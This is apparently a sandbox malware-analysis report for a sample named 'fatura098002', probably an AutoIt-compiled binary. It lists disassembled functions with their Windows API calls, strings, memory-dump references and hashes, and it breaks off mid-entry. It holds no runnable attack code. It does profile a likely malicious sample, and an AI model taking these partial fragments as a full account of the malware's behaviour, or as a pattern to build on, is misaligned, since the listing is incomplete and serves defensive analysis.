Instruction ID: f399c186d8defa7456c82c5b9533c5a8d9e609e0afac075019d2bc69c8a6f100
Opcode Fuzzy Hash: e0867ab4ead4522b4b1385ed5fdd7b34441f7a40902cca7d80c2e3d6f9b798d5
Instruction Fuzzy Hash: 304171B1604204DFDB19CF54C894A9A7BB9FF44358F1480ADFD069F20AD7B8D945DBA0

Function 00792F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00792F8D
LoadLibraryW.KERNEL32(?), ref: 00792F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00792FA9
DestroyWindow.USER32(?), ref: 00792FB1

Strings

SysAnimate32, xrefs: 00792F68

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 07ea52542ecd16366e8b693245a0d7a1583ac76e9adb867aedea80171f7f9c41
Instruction ID: e45bcefe53b0b93e1a24a4ff56c02263f2d02853de0732165bfc7a3d70a69b33
Opcode Fuzzy Hash: 07ea52542ecd16366e8b693245a0d7a1583ac76e9adb867aedea80171f7f9c41
Instruction Fuzzy Hash: 2021DC72200205BBEF11AF64EC84EBB37BAEB59364F104619FA10D20A1C739DC529760

Function 00724D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00724D1E,007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002), ref: 00724D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00724DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00724D1E,007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000), ref: 00724DC3

Strings

CorExitProcess, xrefs: 00724D98
mscoree.dll, xrefs: 00724D86

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1f715678d3a695519a48a5b1fa1e816c33a3cac547a9238715aea70777c166e8
Instruction ID: 4714ab172d48202ce9e7916c5f8894fdef7fcdd5b8a92c7233ede26fc21afe29
Opcode Fuzzy Hash: 1f715678d3a695519a48a5b1fa1e816c33a3cac547a9238715aea70777c166e8
Instruction Fuzzy Hash: 56F0C230A40218FBDF129F90EC09BADBFB5EF44711F0041A9F909A2260CB385D41CBD8

Function 0075D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0075D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0075D3BF
FreeLibrary.KERNEL32(00000000), ref: 0075D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0075D3B9
X64, xrefs: 0075D2A8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 8fb525ce18f5eeffcb2682a3d02870af5f5510c9ecc66e88f9a92a46ea4fbc0d
Instruction ID: de8912ead2b987508069be131d05be4e6d50c6533e9e31042ea03fe2b3f30d32
Opcode Fuzzy Hash: 8fb525ce18f5eeffcb2682a3d02870af5f5510c9ecc66e88f9a92a46ea4fbc0d
Instruction Fuzzy Hash: 6CF0E5B1546A21DBDB3267109C589E97325BF10703F94816AFC06E2154DBECCD8CCA9B

Function 00704E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00704EAE
FreeLibrary.KERNEL32(00000000,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EC0

Strings

kernel32.dll, xrefs: 00704E94
Wow64DisableWow64FsRedirection, xrefs: 00704EA8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 618acca74e8412adc6cd57be64a554fe5bdb26cada00321f248fccaac7ba94e5
Instruction ID: 90aa4b75424f817659626158c9a9da03629ae0b755cab093622809a9f8ad93a6
Opcode Fuzzy Hash: 618acca74e8412adc6cd57be64a554fe5bdb26cada00321f248fccaac7ba94e5
Instruction Fuzzy Hash: A1E0CDF5A415229BD6331725FC18B5F7694AF81F627054216FD04D3150DB6CCD0340EC

Function 00704E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00704E74
FreeLibrary.KERNEL32(00000000,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00704E6E
kernel32.dll, xrefs: 00704E5B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 07e5e1846551f768b259f5e91e55f756d7661e31200a68f09cb77e2f932ab04e
Instruction ID: 811d7078318274e1d50dce03e914b3caa78dc1b69375c96fd1e8291ba2380e32
Opcode Fuzzy Hash: 07e5e1846551f768b259f5e91e55f756d7661e31200a68f09cb77e2f932ab04e
Instruction Fuzzy Hash: 58D0C2B154262197CE231B24BC08E8B2A58AF81B11305825ABA08A2190CF2CCD0281D8

Function 00772947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772C05
DeleteFileW.KERNEL32(?), ref: 00772C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00772C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00772CC0

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 712f07da5f9dea70e8aae65a294de1d12a3fe721c2a8a61059488b987c1bab5d
Instruction ID: f1d306269b4d32e498a3bf23df74bf377dad9d639fd6aa249857b291b213e278
Opcode Fuzzy Hash: 712f07da5f9dea70e8aae65a294de1d12a3fe721c2a8a61059488b987c1bab5d
Instruction Fuzzy Hash: D3B171B1D00129EBDF21DFA4CC89EDE77BDEF49340F1080A6F519E6152EA389A458F61

Function 0078A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0078A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0078A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0078A468
CloseHandle.KERNEL32(?), ref: 0078A63D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: bc3f1453274d56226a2d30775c419be046839c52dff3dfb6079bdb5fb7a11ab8
Instruction ID: f8fad2e1d4e6980dd9bd6bd259257e0959049822c439ae14bdf3004d80d20827
Opcode Fuzzy Hash: bc3f1453274d56226a2d30775c419be046839c52dff3dfb6079bdb5fb7a11ab8
Instruction Fuzzy Hash: 60A1B371644301EFE720EF18C886F2AB7E1AF44714F14895DF9599B2D2DBB4EC418B92

Function 0073BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007A3700), ref: 0073BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,007D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0073BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,007D1270,000000FF,?,0000003F,00000000,?), ref: 0073BC36
_free.LIBCMT ref: 0073BB7F

Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0

_free.LIBCMT ref: 0073BD4B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 5e8226753e35a1c32934fcbf29acac36d3b715b95f95f3813cfcb66a398a00ec
Instruction ID: bac40bd7aa8541df28e7fc677f3034bd5546bc63c19c0fb4294eea050f608eec
Opcode Fuzzy Hash: 5e8226753e35a1c32934fcbf29acac36d3b715b95f95f3813cfcb66a398a00ec
Instruction Fuzzy Hash: 8351E7B1A00219EFEB20EF659C8596AB7BCFF40310F50426BE654D7293EB385E41CB64

Function 0076E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0076CF22,?), ref: 0076DDFD

Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0076CF22,?), ref: 0076DE16

Part of subcall function 0076E199: GetFileAttributesW.KERNEL32(?,0076CF95), ref: 0076E19A

lstrcmpiW.KERNEL32(?,?), ref: 0076E473
MoveFileW.KERNEL32(?,?), ref: 0076E4AC
_wcslen.LIBCMT ref: 0076E5EB
_wcslen.LIBCMT ref: 0076E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0076E650

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: d416f97667dee10a49020a3c911d93cf93be137946727bc73cc738d9f3c656ba
Instruction ID: ecc91e904acd14da7229513a3ccd936331f68caf4d283c373e0fbe6a6ffd035c
Opcode Fuzzy Hash: d416f97667dee10a49020a3c911d93cf93be137946727bc73cc738d9f3c656ba
Instruction Fuzzy Hash: BC5166B2508385DBC724DBA0DC859DF77DCAF85340F00491EFA8AD3191EF78A5888766

Function 0078B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

Part of subcall function 0078C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078C9F1
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA68
Part of subcall function 0078C998: _wcslen.LIBCMT ref: 0078CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0078BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0078BB63
RegCloseKey.ADVAPI32(?,?), ref: 0078BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0078BBB3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: dbfa28fa69fb55fae960dd15e2a4b3dd6e7a0f6854b67debe3f9824b35c4a194
Instruction ID: 10990ec220ca620360a3ca1a12d77c24da06dca8fb1a175a5aec020b3a9d6d6e
Opcode Fuzzy Hash: dbfa28fa69fb55fae960dd15e2a4b3dd6e7a0f6854b67debe3f9824b35c4a194
Instruction Fuzzy Hash: 7361B571208241EFD714EF24C894E2ABBE5FF84308F54855DF4998B2A2DB39ED45CB92

Function 00768BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00768BCD
VariantClear.OLEAUT32 ref: 00768C3E
VariantClear.OLEAUT32 ref: 00768C9D
VariantClear.OLEAUT32(?), ref: 00768D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00768D3B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 10c4aa30926a1f1bca7302fedee1914ecb7e8887c67ca77489d4f2ec030a943e
Instruction ID: fac5c2c8466684a860d424a890208650cad2e5d0e5774b5b979c110e07354f56
Opcode Fuzzy Hash: 10c4aa30926a1f1bca7302fedee1914ecb7e8887c67ca77489d4f2ec030a943e
Instruction Fuzzy Hash: 35515BB5A00619EFCB14CF68C894AAABBF4FF8D310B158559ED16DB350E734E911CBA0

Function 00778AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00778BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00778BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00778C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00778C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00778C5F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 27d9efd43b1974f2ed571a5352aa27d615c5b09274bc308a006b312a634e563a
Instruction ID: 0ca512a6b5754af908934a7ef01f13fe9aaa370e07ea5dd7b97fad5e3acbcca5
Opcode Fuzzy Hash: 27d9efd43b1974f2ed571a5352aa27d615c5b09274bc308a006b312a634e563a
Instruction Fuzzy Hash: 75513D75A00215DFCB05DF54C885AA9BBF5FF48314F08C499E8496B3A2CB39ED51CB91

Function 00788EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00788F40
GetProcAddress.KERNEL32(00000000,?), ref: 00788FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00788FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00789032
FreeLibrary.KERNEL32(00000000), ref: 00789052

Part of subcall function 0071F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00771043,?,7556E610), ref: 0071F6E6
Part of subcall function 0071F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0075FA64,00000000,00000000,?,?,00771043,?,7556E610,?,0075FA64), ref: 0071F70D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 22b7fd4016bb78edfe44743aa287cb9c161e69f101d10d14fef7bd300b9fc71d
Instruction ID: 6139136ca3023f9d7e806d8968d8df57ca22782c2140f9e927b50d89bc061c17
Opcode Fuzzy Hash: 22b7fd4016bb78edfe44743aa287cb9c161e69f101d10d14fef7bd300b9fc71d
Instruction Fuzzy Hash: 2C514F34640205DFCB15EF54C4848ADBBF1FF49314F488199E906AB3A2DB35ED85CB91

Function 00796B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00796C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00796C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00796C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0077AB79,00000000,00000000), ref: 00796C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00796CC7

Memory Dump Source

